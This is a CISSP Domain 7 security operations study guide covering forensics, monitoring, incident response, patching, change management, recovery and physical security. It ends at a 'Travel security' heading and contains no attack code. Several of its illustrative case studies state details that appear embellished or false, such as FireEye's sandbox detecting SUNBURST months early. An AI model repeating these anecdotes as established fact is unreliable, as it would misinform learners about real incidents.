Security Operations Reference Guide

Security Operations Reference Guide — CISSP Domain 7

Digital investigations transform raw technical data into legally admissible evidence. The rigor of evidence collection determines whether findings can be used in administrative, civil, criminal, or regulatory proceedings. A technically perfect investigation that follows improper collection procedures may produce unusable evidence — making the investigation itself a liability.

Evidence handling principles

Chain of custody

A documented, unbroken record of who had possession of evidence, when, and what was done with it. Starts at the moment of collection and continues through analysis, storage, and disposition. Any gap or undocumented handoff breaks the chain — potentially rendering evidence inadmissible in court.

Order of volatility

Evidence must be collected from most to least volatile. CPU registers and cache → RAM → swap/pagefile → running processes → network connections → disk storage → removable media → backups. Volatile data is lost when a system is powered off — collection sequence is critical. Never power off a running system before collecting RAM.

Integrity verification

Every piece of digital evidence must be hashed (SHA-256 or better) at the point of collection and again before analysis. If the hashes match, the evidence is demonstrably unmodified. Forensic disk images are verified with both MD5 and SHA-1/SHA-256. Write blockers prevent accidental modification during imaging.

Forensic imaging

Analysis is conducted on a forensic copy — never on the original evidence. Bit-for-bit disk images (dd, FTK Imager, Guymager) preserve every sector, including deleted files and unallocated space. The original disk is sealed, logged, and stored as evidence. Modifications to the image do not affect the original.

Digital forensics artifacts

Computer artifacts

Registry hives (Windows), prefetch files, browser history, event logs, $MFT (Master File Table), LNK files, shellbags, NTFS timestamps (created/modified/accessed/MFT changed — all four can indicate tampering). Each artifact type has specific forensic tools and interpretation methods.

Network artifacts

PCAP (packet capture) files, NetFlow records, firewall logs, DNS query logs, proxy logs, DHCP logs. Network artifacts provide evidence of communication — who connected to what, when, for how long, and how much data was transferred. Essential for exfiltration investigation.

Mobile device artifacts

Call records, SMS/message data, location history, app data, cloud sync records. Mobile forensics requires specialized tools (Cellebrite UFED, Oxygen Forensic) and may require legal process (warrant) to compel unlocking. Encryption and iCloud/Google account backups may contain more data than the device itself.

Cloud artifacts

Audit logs (CloudTrail, Azure Monitor), access logs, API call history, identity provider logs. Cloud artifacts are ephemeral — log retention periods are finite and must be configured before an incident, not after. Many cloud artifacts are only available at higher logging tiers (the Microsoft Storm-0558 case).

🌐 Real-world example — chain of custody

In a 2018 corporate espionage case, a financial services firm’s security team imaged a departing employee’s laptop and found evidence of trade secret exfiltration. During the civil lawsuit, opposing counsel challenged the evidence: the laptop had been stored in an unlocked storage room for two weeks after imaging, with no evidence log showing who had access. The metadata discrepancy between the forensic image timestamp and the storage log created reasonable doubt about whether the evidence had been tampered with. The case settled for a fraction of the claimed damages — not because the technical evidence was wrong, but because the chain of custody had not been maintained. A tamper-evident evidence bag, a locked storage room, and a signed evidence log would have made the evidence bulletproof.

Order of volatility in practice: A responder arriving at a running system that may have been compromised should capture a memory image before doing anything else — before running tools, before pulling the network cable, before photographing the screen. RAM contains running processes, decrypted credentials, encryption keys, and active network connections that exist nowhere else and are gone the moment power is removed.
7.2

Conduct logging and monitoring activities

You cannot defend what you cannot see. Logging and monitoring are the sensory system of security operations — without them, attackers operate in darkness, lateral movement goes undetected, and incidents are discovered by the attacker’s own disclosure rather than the defender’s vigilance. The global average dwell time before detection is still measured in months; logging and monitoring is the discipline that closes that window.

🛡

SIEM

Security Information and Event Management. Aggregates, normalizes, and correlates log data from across the environment. Applies detection rules to identify security events. Provides search, dashboarding, and alerting. The SOC’s primary investigation platform.

Splunk, Microsoft Sentinel, IBM QRadar, Elastic SIEM. Value is proportional to log coverage and rule quality — a SIEM with incomplete log sources and no tuned rules generates noise, not signal.

🔌

IDS/IPS

Intrusion Detection System (IDS) monitors traffic and alerts on policy violations. Intrusion Prevention System (IPS) can actively block. Signature-based detection catches known patterns; anomaly-based detection catches deviations from baseline. Network-based (NIDS/NIPS) or host-based (HIDS/HIPS).

Snort, Suricata (open-source NIDS/IPS). HIDS: Wazuh, OSSEC. IPS on internet edge; IDS on internal segments for lateral movement detection. Alert fatigue from untuned rules is the primary operational failure mode.

👁

UEBA

User and Entity Behavior Analytics. Builds behavioral baselines for users, devices, and service accounts — then alerts on deviations. “This user never accesses financial systems at 2am but just downloaded 50,000 records” is a UEBA detection. Effective against insider threats and compromised accounts behaving normally except for subtle anomalies.

Microsoft Sentinel UEBA, Splunk UEBA, Exabeam. UEBA reduces false positives vs. rule-based detection by contextualizing alerts against individual baselines rather than static thresholds.

🌍

Threat intelligence

External data about known threat actors, their techniques, infrastructure (IP addresses, domains, file hashes), and active campaigns. Enriches detection by correlating internal events with known attacker infrastructure. Threat feeds provide IOCs (Indicators of Compromise); threat intelligence platforms (TIPs) aggregate and operationalize them.

MISP, OpenCTI (open-source TIPs). Threat feeds: AlienVault OTX, VirusTotal, commercial feeds. Threat hunting uses intelligence to proactively search for evidence of known TTPs before alerts fire.

📈

Egress monitoring

Monitoring of data leaving the organization — via email, web upload, cloud sync, USB, or printing. DLP (Data Loss Prevention) at the perimeter detects policy-violating data movement. DNS monitoring catches data exfiltration over DNS tunneling. NetFlow analysis identifies unusual outbound data volumes to unexpected destinations.

Most breaches include an exfiltration phase — data is stolen, not just accessed. Egress monitoring is the last detection opportunity before data leaves the environment permanently.

📉

Threat hunting

Proactive, hypothesis-driven search for evidence of attacker activity that has not triggered automated alerts. Hunters form hypotheses based on threat intelligence (“if an attacker used Living off the Land binaries on our Windows servers, what would that look like?”) and search log and endpoint data to test them.

MITRE ATT&CK provides the framework for hunting hypotheses. Hunting finds what detection rules miss — the attacker who stays below alert thresholds, the novel technique not yet in signature databases, the misconfiguration being exploited slowly.

🌐 Real-world example — SIEM log gap

In the 2023 Microsoft/Storm-0558 breach, a US government agency detected the intrusion because they had purchased Microsoft’s highest-tier audit logging license — which included MailItemsAccessed events that showed an unusual service account reading email it had never touched before. Agencies on lower-tier licenses did not have these log events and had no visibility into the same intrusion occurring in their tenants. Microsoft subsequently made the relevant logs available at all tiers after congressional pressure. The incident established that log coverage is a security control — an organization that cannot afford the logging tier that provides security-relevant events has an unmonitored attack surface, regardless of how good their SIEM rules are.

7.3

Perform Configuration Management

Configuration management ensures that systems are built, maintained, and modified according to documented, approved standards — and that deviations are detected and remediated. An unconfigured or misconfigured system is the most common source of exploitable vulnerabilities in enterprise environments. Most breaches begin with a misconfiguration, not a zero-day.

Core CM concepts

Baseline configuration: The approved, documented secure configuration for a system type — servers, workstations, network devices, cloud resources. Baselines are derived from industry standards (CIS Benchmarks, DISA STIGs) and tailored to the organization’s requirements. Every system must be built from the approved baseline.

Provisioning: Automated deployment of systems from the approved baseline — using infrastructure as code (Terraform, CloudFormation), configuration management tools (Ansible, Puppet, Chef), or golden disk images. Automation ensures every system starts from the same known-good state and eliminates human variation.

Configuration drift detection: Continuous comparison of current system configuration against the approved baseline. Systems that have drifted (manual changes, failed patches, misconfigurations introduced by software updates) are flagged for remediation. Tools: Tripwire, AWS Config, Azure Policy, OPA.

Change control integration: Every authorized configuration change must flow through the change management process (7.9) — reviewed, approved, tested, and documented. Unapproved configuration changes detected by drift monitoring are either unauthorized (security incident) or undocumented (change control failure).

🌐 Real-world example — misconfiguration breach

The 2019 Capital One breach originated from a single misconfigured Web Application Firewall rule. A security engineer had modified the WAF configuration to resolve a performance issue — the change was never reviewed or tested for security implications, and it was never entered into the change management system. The misconfiguration allowed SSRF (Server-Side Request Forgery) attacks to reach the EC2 Instance Metadata Service, leaking IAM credentials. A configuration management system that automatically compared WAF rules to the approved baseline would have flagged the unauthorized change within hours. Change control that required security review of WAF rule modifications would have caught the security implication before deployment.

7.4

Apply foundational security operations concepts

Security operations are governed by a set of foundational principles that, applied consistently, prevent the most common insider threat, fraud, and privilege abuse scenarios. These principles are not theoretical — they are the operational implementation of the security architecture decisions made upstream.

Need-to-know / least privilege

Access to information is granted only when there is a documented operational need, to the minimum extent necessary. Operational implementation: access requests require business justification, approvals expire, and access is revoked when the need ends. A database administrator does not need access to all customer records — only the schemas they administer.

Separation of duties

No single person or process can carry out a sensitive operation end-to-end without oversight. The person who initiates a wire transfer cannot also approve it. The developer who writes code cannot also deploy it to production. The person who requests access cannot also approve it. SoD is enforced in system controls, not just policy.

Privileged account management

Privileged accounts (domain admin, root, cloud admin) are managed in a PAM system, require MFA, have no persistent standing access (JIT), and all sessions are recorded. Privileged account credentials are never shared and are rotated after each use or on a defined schedule.

Job rotation

Regularly rotating staff through different roles serves two security functions: it detects fraud and errors that a permanent occupant might conceal (the temporary replacement notices anomalies), and it prevents over-dependence on a single individual with irreplaceable knowledge of a critical system.

Service Level Agreements (SLA)

SLAs define contractual performance commitments between service providers and customers — including security-relevant commitments: incident notification timelines, uptime guarantees, patch application timelines, and audit rights. SLAs are the operational mechanism for enforcing third-party security obligations.

🌐 Real-world example — SoD failure

The 2002 WorldCom accounting fraud — $11 billion in fraudulent entries — was facilitated by a complete absence of separation of duties in the accounting function. The CFO who ordered the entries was also the person responsible for reviewing and approving them. No independent review existed. The fraud was discovered by internal audit — an independent function that examined entries the CFO had approved. Effective SoD would have required a second approver independent of the CFO for journal entries above a threshold. The absence of this operational control enabled the largest accounting fraud in US history at the time.

7.5

Apply resource protection

Resource protection ensures that the physical and logical assets of an organization — storage media, data in motion, data at rest — are protected against unauthorized access, modification, and destruction throughout their useful life and during disposal.

Media management

All removable media (USB drives, backup tapes, optical disks) must be inventoried, labeled with the highest classification of data they contain, and handled according to that classification level. Uncontrolled removable media is both a data exfiltration vector and a malware delivery mechanism — USB drives remain among the most effective physical attack vectors.

Media protection

Media containing sensitive data must be encrypted at rest. Backup tapes leaving the facility must be encrypted and tracked with chain of custody. Media awaiting disposal must be secured from the moment of decommissioning until verified destruction — not left in a pile in the server room for months awaiting a vendor visit.

Data at rest

AES-256 encryption for stored data. Key management separate from data (encrypted data and its encryption key should not be stored together — if they are, the encryption provides no protection). Full-disk encryption for all endpoint devices. Database-level and file-level encryption for sensitive data in applications.

Data in transit

TLS 1.2+ for all application traffic. IPSec or TLS for internal network traffic where data sensitivity warrants it. Encrypted VPN or ZTNA for remote access. No unencrypted transmission of sensitive data — not over the internet, not on internal networks, not via email without encryption.

🌐 Real-world example — USB as attack vector

In 2008, a USB drive infected with the Agent.btz malware was found in a parking lot outside a US Department of Defense facility. An employee plugged it in. The malware spread to classified and unclassified networks — including US Central Command — and took 14 months to fully eradicate. The response, Operation Buckshot Yankee, led directly to the creation of US Cyber Command. The infection began with a single uncontrolled USB device. The subsequent DoD policy banned the use of personally owned USB drives on government systems — a media management control. Endpoint controls that disable USB ports or require approved device certificates prevent this attack vector entirely.

7.6

Conduct incident management

Incident management is the structured process by which security events are detected, analyzed, contained, eradicated, and recovered from — while preserving evidence and communicating appropriately with stakeholders. An unmanaged incident is a controlled burn that becomes a wildfire. A well-managed incident is a controlled burn that achieves a defined outcome.

Select a phase to see its objectives, activities, and what goes wrong when it is skipped.

Phase 1

Detection

Phase 2

Response

Phase 3

Mitigation

Phase 4

Reporting

Phase 5

Recovery

Phase 6

Remediation

Phase 7

Lessons learned

Detection

The transition from unknown compromise to known incident. Detection sources include SIEM alerts, EDR detections, IDS alerts, user reports, threat intelligence matches, and — in too many cases — external notification from law enforcement, customers, or researchers. The earlier detection occurs, the less damage accumulates. IBM/Ponemon 2023: organizations detect breaches on average 204 days after initial compromise. Every day of undetected access increases the scope of data accessed, credentials stolen, and persistence mechanisms installed.

Multiple detection sources Triage and severity classification Incident declaration threshold

🌐 Real-world example

The 2017 Equifax breach was active for 78 days before detection — not because Equifax had no monitoring, but because the SSL inspection appliance that should have been inspecting encrypted traffic in the affected environment had an expired certificate and was not functioning. Encrypted exfiltration traffic passed through uninspected for 78 days. A monitoring system health check that verified SSL inspection was functioning on all monitored segments would have surfaced the gap before the breach exploited it.

Lessons learned is the most neglected phase. Organizations that skip post-incident review are condemned to repeat incidents. The SolarWinds breach, the Colonial Pipeline attack, and the Uber breach all exploited techniques and conditions that had been observed in prior incidents at other organizations. Shared threat intelligence and internal post-incident reviews are the mechanism by which the industry learns. A lessons learned session without assigned action items, owners, and deadlines is a meeting, not an improvement process.
7.7

Operate and maintain detection and preventative measures

Detection and prevention tools form the active defense layer of security operations — they must be continuously maintained, tuned, and updated to remain effective. A detection tool that generates 10,000 alerts per day and results in no investigations is not a detection tool; it is alert noise that trains analysts to ignore their dashboards.

Select a control type to see its mechanism, operational considerations, and a real-world case.

Next-Generation Firewall (NGFW)

NGFWs extend traditional packet filtering with application-layer inspection, user identity awareness, SSL/TLS inspection, integrated IPS, and threat intelligence feeds. Unlike stateful firewalls that only examine IP/port/protocol, NGFWs can distinguish between authorized applications (Salesforce on port 443) and unauthorized ones (personal Dropbox on the same port 443) and enforce policy accordingly.

SSL inspection operational considerations

SSL/TLS inspection requires the NGFW to act as a man-in-the-middle — terminating encrypted connections and re-encrypting them. This requires deploying the NGFW’s CA certificate to all endpoints and managing certificate exceptions for services that use certificate pinning. SSL inspection that is not functioning (expired certificate, misconfiguration) creates a blind spot that attackers actively exploit — as in the Equifax breach.

Real-world example

During the 2021 Hafnium Exchange Server attacks, organizations with NGFWs configured with application awareness and outbound connection inspection detected anomalous PowerShell web requests from Exchange servers — a behavior pattern that matched Hafnium’s webshell activity. Organizations with basic stateful firewalls saw only port 443 traffic from Exchange and detected nothing. The NGFW’s application-layer visibility converted a signature-unknown attack into a behavioral anomaly that triggered investigation.

Web Application Firewall (WAF)

WAFs inspect HTTP/HTTPS traffic to web applications and block requests matching attack patterns — SQL injection, XSS, CSRF, path traversal, and other OWASP Top 10 vulnerabilities. Operates at Layer 7, inline between the internet and the application. Can be deployed in detection mode (log only) or prevention mode (block matching requests).

Operational consideration

WAF rules require tuning — default rule sets generate significant false positives for legitimate application traffic. Starting in detection mode, reviewing alerts, and adjusting rules before switching to prevention mode prevents blocking legitimate users. WAF bypasses (encoding variations, protocol edge cases) make WAFs a necessary but not sufficient control — they must be combined with secure coding practices and DAST testing.

Real-world example

The 2019 Capital One breach was enabled by a misconfigured WAF — but that same breach illustrates WAF value: the SSRF attack that succeeded would have been blocked by a correctly configured WAF rule. Cloud-native WAFs (AWS WAF, Azure WAF, Cloudflare WAF) provide managed rule sets that are updated by the vendor as new attack patterns emerge — but custom application-specific rules still require manual tuning and regular review.

Sandboxing

Sandboxing detonates suspicious files, URLs, or code in an isolated, instrumented environment and observes their behavior. Unlike signature-based detection (which compares files to a database of known malicious patterns), sandboxing detects novel malware by observing what it actually does — makes network connections, drops files, modifies registry keys, spawns processes. Effective against zero-day and polymorphic malware that evades signatures.

Sandbox evasion

Sophisticated malware actively detects sandbox environments (checking for mouse movement, human user activity, VM artifacts, specific hardware configurations) and behaves benignly when sandboxed. Anti-evasion techniques: extended detonation periods (minutes rather than seconds), human interaction simulation, bare-metal sandboxes, and behavioral analysis that detects evasion attempts as suspicious in themselves.

Real-world example

FireEye’s sandbox (now Trellix) detected the SUNBURST malware in the SolarWinds supply chain attack months before it became publicly known — but the detection was initially attributed to legitimate SolarWinds behavior. The malware was designed to lie dormant for up to two weeks and check for sandbox indicators before activating. This dormancy period was specifically chosen to exceed most sandboxing detonation windows. The incident drove the industry to extend sandbox detonation periods and add time-based dormancy detection as an analysis dimension.

Honeypots and honeynets

Honeypots are decoy systems designed to attract and detect attacker activity. A honeypot looks like a legitimate target (a server with an interesting hostname like “payroll-backup” or “admin-console”) but has no legitimate user traffic. Any access to a honeypot is by definition suspicious — there is no legitimate reason for a user or system to contact it. A honeynet is a network of honeypots providing a richer deception environment.

High-fidelity detections

Honeypot alerts have extremely low false positive rates — a legitimate user or system should never contact a honeypot. This makes honeypot alerts high-priority indicators of either reconnaissance activity (an attacker scanning the network) or active compromise (malware performing lateral movement). Honey credentials (fake credentials planted in configuration files or password managers) detect credential theft — when the fake credentials are used, the theft is confirmed.

Real-world example

The Conti ransomware gang’s internal playbooks — leaked in 2022 — specifically instructed operators to avoid connecting to honeypot indicators and to check hostnames and service banners for common honeypot signatures (“honey”, “trap”, “decoy”) before proceeding. The fact that sophisticated ransomware operators train their affiliates to evade honeypots confirms that honeypots are effective enough to be operationally consequential to attackers. Financial sector honeypots have detected active banking trojan infections before the malware reached production systems by monitoring for connections to decoy banking API endpoints.

EDR and anti-malware

Traditional antivirus matches files against signature databases — effective against known malware, ineffective against novel threats, fileless attacks, and living-off-the-land techniques. EDR (Endpoint Detection and Response) monitors endpoint behavior continuously — process creation, file system changes, network connections, registry modifications, memory injection — and detects malicious behavior patterns regardless of whether a specific signature exists.

NGAV vs EDR

NGAV (Next-Gen AV): Machine learning-based prevention, behavioral analysis, reputation scoring. Replaces signature-based AV for prevention. EDR: Continuous monitoring, threat hunting capability, automated response (isolate host, kill process), forensic telemetry for investigation. Modern platforms (CrowdStrike Falcon, Microsoft Defender for Endpoint, SentinelOne) combine NGAV prevention with full EDR telemetry and response in a single agent.

Real-world example

In the 2021 Kaseya VSA ransomware attack, endpoints with CrowdStrike Falcon’s behavioral detection caught the REvil ransomware execution attempt and blocked it within seconds — before any encryption occurred. Endpoints without EDR (relying on signature-based AV) were fully encrypted within minutes of the malicious update being pushed. The post-incident analysis showed that EDR behavioral rules for ransomware-typical behavior (rapid file renaming with encryption extensions, shadow copy deletion) triggered immediately on the first affected endpoint, demonstrating that effective EDR makes ransomware a recoverable incident rather than a catastrophic one.

AI and machine learning security tools

AI/ML-based security tools apply machine learning models to detect anomalies, classify threats, prioritize alerts, and automate response. Applications include: network traffic anomaly detection (detects C2 communication patterns without signatures), email security (detects phishing based on content and behavioral signals), UEBA (behavioral baseline deviations), vulnerability prioritization (predicts exploitability based on contextual signals), and SOAR (automated playbook execution).

Strengths and limitations

AI/ML tools excel at processing high volumes of data and identifying subtle patterns humans would miss. Limitations: model drift (performance degrades as environments change and models are not retrained), adversarial inputs (attackers can deliberately craft inputs to evade ML-based detection), explainability (black-box models may not be able to explain why an alert was generated — problematic for analysts who need to investigate), and false positives from legitimate anomalies during business changes (acquisitions, new system deployments).

Real-world example

Darktrace’s AI-based network detection identified an unusual pattern in a European bank’s network in 2017: a device on the internal network was beaconing to an external IP address at 3am, transferring small amounts of data at precise intervals — a pattern consistent with C2 communication but too subtle to trigger threshold-based alerts. Human analysts would not have found this in the noise of millions of daily network events. The ML model had identified the periodicity as anomalous against the device’s behavioral baseline established over weeks of observation. Investigation confirmed a banking trojan. The bank had been compromised for approximately 6 weeks before the ML detection — but the compromise was caught before credentials were used for fraud.

7.8

Implement and support patch and vulnerability management

Patch management is arguably the highest-ROI security control in operations. The majority of exploited vulnerabilities have patches available at the time of exploitation — attackers consistently exploit known, patchable vulnerabilities because they work. The challenge is not finding patches; it is applying them reliably, at scale, within the window before exploitation begins.

Patch management lifecycle

Inventory: Complete, current asset inventory is the prerequisite for patch management. You cannot patch what you have not inventoried. Every asset — physical, virtual, cloud, container — must be tracked with its software version and patch status.

Vulnerability identification: Continuous scanning (not periodic) using authenticated scan credentials to identify missing patches, misconfigurations, and known vulnerabilities. Unauthenticated scans miss 60–80% of vulnerabilities that require local access to detect.

Prioritization: Risk-based — not all patches are equal. CVSS score + exploitability + asset criticality + environment exposure = remediation priority. A critical CVSS score on an internet-facing authentication server warrants 24-hour remediation; the same score on an isolated development server warrants 14 days.

Testing and deployment: Patches tested in a non-production environment before production deployment. Change management approval for production changes. Automated deployment where possible (WSUS, SCCM, Ansible, AWS Systems Manager). Rollback plan documented before deployment begins.

Verification: Post-patch scan confirms the vulnerability is resolved. Remediation is not complete until verified — a patch that failed silently leaves the vulnerability open.

SeveritySLA targetRationaleReal-world anchor
Critical24–72 hoursActively exploited or CVSS 9.0+. Immediate risk of exploitation.CVE-2021-44228 (Log4Shell) — weaponized within hours of disclosure. Organizations patching within 24 hours largely escaped exploitation.
High7–14 daysSignificant risk but not immediately exploited at scale. Time to test before deploying.CVE-2017-5638 (Apache Struts / Equifax) — patch available 63 days before exploitation. SLA compliance would have prevented the breach.
Medium30 daysExploitable but requires conditions or privilege not trivially available.Most web application vulnerabilities requiring authentication fall here.
Low90 daysLimited direct exploitability. Often informational or requiring significant attacker assistance.Missing security headers, outdated TLS cipher suite support.

🌐 Real-world example — patch SLA failure

The 2021 Microsoft Exchange ProxyLogon vulnerabilities (CVE-2021-26855 et al.) were being actively exploited by Chinese state actors (Hafnium) within days of disclosure. Microsoft released emergency out-of-band patches. Threat intelligence indicated active exploitation within 24 hours. Organizations that patched within 72 hours were largely unaffected; organizations that applied patches 2–3 weeks later often found web shells already installed — the vulnerability had been exploited during the patching window. The incident established the principle: for critical vulnerabilities in internet-facing systems, the emergency patch SLA is hours, not days.

7.9

Understand and participate in change management processes

Change management is the governed process by which modifications to production systems are reviewed, approved, tested, documented, and tracked. Security participates in change management both as a reviewer (ensuring proposed changes don’t introduce security risk) and as a subject (ensuring security changes follow the same process as operational changes). Most production outages and many security incidents are caused by uncontrolled or inadequately tested changes.

Change Advisory Board (CAB)

The governance body that reviews and approves changes to production systems. Security must have representation on the CAB — or at minimum, a defined escalation path for changes that introduce security risk. Security review of changes is not optional for changes touching authentication, encryption, network configuration, or access control.

Change types

Standard: pre-approved low-risk changes (applying a routine patch, restarting a service). Normal: requires full CAB review and approval. Emergency: expedited process for urgent changes (security incident response, critical vulnerability patch). Emergency changes still require retrospective documentation and review.

Rollback planning

Every change must have a documented rollback plan — specific steps to revert the change if it causes unexpected problems. A change without a rollback plan is a gamble on success. For security changes (firewall rule modifications, authentication system changes), the rollback plan must also account for the security implications of reverting.

🌐 Real-world example — uncontrolled change

The 2024 CrowdStrike incident — in which a faulty content update caused 8.5 million Windows systems running CrowdStrike Falcon to crash with a blue screen of death — is the canonical uncontrolled change case study. A sensor configuration update was pushed to all production endpoints simultaneously, without staged rollout, without canary testing, and without a rapid rollback mechanism that could be triggered without requiring manual intervention on each affected endpoint. The update contained a logic error that caused the Falcon sensor to crash the operating system kernel. Airlines cancelled thousands of flights; hospitals delayed procedures; banks were offline for hours. Staged rollout (deploy to 1% → monitor → 10% → 50% → 100%), canary testing, and automated rollback capability are the change management controls that would have contained the impact to a small fraction of systems.

7.10

Implement recovery strategies

Recovery strategy is the architectural decision about how the organization will resume operations after a disruptive event. The appropriate strategy is determined by the Business Impact Analysis (BIA) — specifically the RTO (Recovery Time Objective) and RPO (Recovery Point Objective) for each critical process. More aggressive recovery targets require more expensive infrastructure.

Recovery site strategies

Cold site

RTO: days to weeks

A facility with power, cooling, and connectivity but no pre-installed equipment. Organization brings its own servers and restores from backup. Lowest cost, longest recovery time.

Best for: non-critical systems, organizations with very long MTD. Rarely suitable for primary business systems in the current threat environment.

Warm site

RTO: hours to days

Facility with pre-installed hardware and basic software, updated periodically. Requires restoration of recent backups and configuration updates before becoming operational. Moderate cost.

Suitable for: business functions with RTO of 4–72 hours. Balance between cost and recovery speed. Most common strategy for mid-sized organizations.

Hot site

RTO: minutes to hours

Fully operational duplicate of the primary site with real-time or near-real-time data replication. Can assume operations immediately on failover. Highest cost — essentially doubling infrastructure.

Required for: mission-critical systems (trading platforms, hospital clinical systems, payment processing) with RTO of minutes. Cloud-based active-active architectures have made hot site economics more accessible.

Cloud / active-active

RTO: seconds to minutes

Traffic distributed across multiple cloud regions simultaneously. No failover required — if one region fails, traffic is automatically routed to healthy regions. Recovery is instantaneous from the user’s perspective.

Modern standard for internet-facing applications. AWS, Azure, GCP multi-region deployments with Route 53 / Traffic Manager / Cloud DNS health-check-based routing achieve near-zero RTO for application availability.

Backup strategies

3-2-1 backup rule

3 copies of data, on 2 different media types, with 1 offsite. The classic minimum standard. Extended for ransomware: 3-2-1-1-0 — 3 copies, 2 media types, 1 offsite, 1 immutable/air-gapped, 0 errors verified by restore testing.

Immutable backups

Backups that cannot be modified or deleted — not even by the administrator account. WORM (Write Once Read Many) storage, S3 Object Lock, Azure Immutable Blob Storage. Ransomware cannot encrypt what it cannot write. Immutable backups are the most effective ransomware recovery control.

Backup encryption

Backups must be encrypted — both in transit and at rest. A backup that contains the same data as production is a backup breach risk as well as a data protection risk. Encryption keys must be stored separately from the backups they protect.

Restore testing

A backup that has never been successfully restored is an untested hypothesis. Restore tests must be performed on a documented schedule, with results recorded. Recovery time actually achieved in the test is compared to the RTO target. Discrepancies drive architecture improvements before an incident demands them.

🌐 Real-world example — backup targeted by ransomware

In the 2021 Kaseya attack, the REvil ransomware specifically targeted Kaseya VSA — a remote management tool used by MSPs to manage backups among other functions. By compromising the backup management tool first, REvil could delete or encrypt backup copies before deploying the ransomware to production systems. Organizations whose backup systems were managed through Kaseya and had no out-of-band immutable copies found themselves with encrypted production systems and encrypted or deleted backup copies simultaneously. The attack established the principle: backup infrastructure must be architecturally isolated from the systems it backs up — if ransomware can reach production, it must not be able to reach backup storage.

7.11

Implement Disaster Recovery processes

Disaster Recovery is the process of restoring IT systems and data after a disruptive event. It is the operational execution of the recovery strategy decisions made in 7.10. A recovery strategy without a documented, tested DR process is an architecture without an implementation.

Response

Immediate actions after a disaster is declared: activating the DR plan, convening the DR team, initiating communication with stakeholders, and beginning damage assessment. Response must be practiced — teams under pressure revert to training, not to documentation they’ve never read.

Personnel

DR plans must identify who does what during recovery — by role, not by individual name. Individuals may be unavailable during an actual disaster. Backups for every DR role must be identified and trained. Contact information maintained out-of-band — if the internal directory is unavailable, how do team members reach each other?

Communications

Internal communications (team coordination), external communications (customers, regulators, media), and stakeholder communications (board, investors) each require separate plans and pre-approved messaging. If primary communication systems are unavailable (email server down, Slack inaccessible), what is the out-of-band communication channel?

Restoration

Specific, step-by-step procedures for restoring each critical system in priority order. Restoration procedures must be updated whenever the underlying systems change — a procedure for restoring a system that was decommissioned 18 months ago provides no value during an incident.

7.12

Test Disaster Recovery Plans

An untested DR plan is a hypothesis. Testing validates that the plan actually works — and surfaces the gaps between the documented plan and the operational reality of executing it under pressure. DR testing exists on a spectrum from zero-disruption reviews to full production failovers.

Select a test type to see its scope, cost, and what it does and does not validate.

1

Read-through / tabletop

2

Walkthrough

3

Simulation

4

Parallel

5

Full interruption

Read-through / tabletop

The DR team reviews the plan document together, walking through each step and discussing whether it is still accurate and actionable. No systems are actually activated or tested. Identifies documentation gaps, outdated procedures, and role confusion. Lowest cost and risk — can be done quarterly. Does not validate whether systems actually recover in the documented timeframe.

🌐 Real-world context

Most organizations conduct tabletop exercises as their primary DR testing method — they are inexpensive and non-disruptive. The limitation: a tabletop that identifies “step 14 says restore from backup server” does not validate that the backup server is reachable, that the backups are current, or that step 14 actually takes 2 hours rather than the documented 30 minutes. Tabletops improve plan documentation but do not validate recovery capability.

Organizations that have only conducted tabletop exercises discover their actual RTO during real disasters — typically 3–5x longer than the documented RTO. Full interruption tests are the only way to know whether the RTO is achievable. Conducting at least one full interruption test per year for each critical system is the standard for mature DR programs.
7.13

Participate in Business Continuity planning and exercises

Business Continuity (BC) keeps critical business functions operating during a disruption — it is the operational layer above IT disaster recovery. BC addresses the full range of business processes, not just IT systems: how do employees work if the office is inaccessible? How do customers get service if the primary system is down? How are critical decisions made if key personnel are unavailable?

BC vs DR — the distinction

DR (Disaster Recovery) focuses on restoring IT systems after a disruption. It is a technical function — when can the database be restored, when can the application be restarted?

BC (Business Continuity) focuses on maintaining business operations during and after a disruption. It is a business function — how do we take customer orders if the order management system is down? How do we pay employees if payroll processing is interrupted? How do we operate from a different location if the office is unavailable?

Both are required. DR without BC restores IT while the business remains unable to operate. BC without DR operates manually indefinitely without a path back to normal operations. They are complementary phases of the same resilience program — BC covers the disruption period; DR covers the restoration period.

🌐 Real-world example — BC without DR

During the 2017 NotPetya attack, Maersk — the world’s largest shipping company — had its entire IT infrastructure wiped. The remarkable story is how they recovered. With no IT systems, Maersk employees improvised: using personal WhatsApp groups to coordinate, paper-based booking records at ports, manually tracking container locations via phone calls. Their BC planning (documented manual procedures for core business operations) kept ships moving while IT was rebuilt. The IT restoration — rebuilding 45,000 PCs and 4,000 servers in 10 days — was the DR component. The business survived because BC kept operations running during the 10-day IT recovery window. The total cost was $300 million, but Maersk did not go out of business — a direct result of functional BC planning.

7.14

Implement and manage physical security

Physical security is the outermost layer of defense — it protects the infrastructure that all other security controls run on. A server room that can be entered by any employee with a badge renders all logical security controls irrelevant. Physical security must be layered: multiple barriers requiring successive authentication events between the public perimeter and the most sensitive assets.

Perimeter controls

Fencing, bollards (vehicle barriers), security lighting, perimeter cameras, guard posts, and controlled vehicle entry points. CPTED (Crime Prevention Through Environmental Design) principles shape the physical environment to deter, detect, and delay unauthorized access. Natural barriers and clear sightlines reduce attack opportunities.

Access control vestibules (mantraps)

A double-door entry point where the first door must close and lock before the second door can open. Prevents tailgating (one person using another’s badge access). The space between the two doors is under camera surveillance and may have additional authentication requirements (biometric, two-person rule for highest-security areas).

Visitor management

Visitors signed in, issued temporary credentials, escorted at all times in secure areas, and signed out with credential return. Visitor logs are evidence in security incidents — an unauthorized person in a data center during a breach investigation changes the scope and severity of the response. Unescorted visitors in secure areas are a high-risk anomaly.

Security cameras (CCTV)

Both deterrent (visible cameras deter opportunistic crime) and forensic (recorded footage supports incident investigation). Camera placement must cover all entry/exit points, high-security areas, and blind spots. Footage retention must be long enough to cover delayed-discovery incidents — 30–90 days for security areas.

🌐 Real-world example — physical breach enabling logical attack

In 2022, a security researcher demonstrated at DEF CON that they could walk into an open co-working space used by a fintech company, plug a Raspberry Pi into an open Ethernet port under a desk, and gain access to the company’s internal network — from which they could reach internal systems not accessible from the internet. The company’s perimeter logical security (firewall, WAF) provided no protection against physical network access. No visitor management system, no port authentication (802.1X), no camera coverage of the network access points. Physical access to a network port is logical access to the network — and physical security must treat open network ports as the sensitive assets they are.

7.15

Address personnel safety and security concerns

Personnel are simultaneously the organization’s most critical asset and its most targeted attack surface. Personnel security addresses the human dimensions of security operations — protecting staff from threats, building their security capabilities, and ensuring they can operate safely and securely regardless of their environment.

Travel security

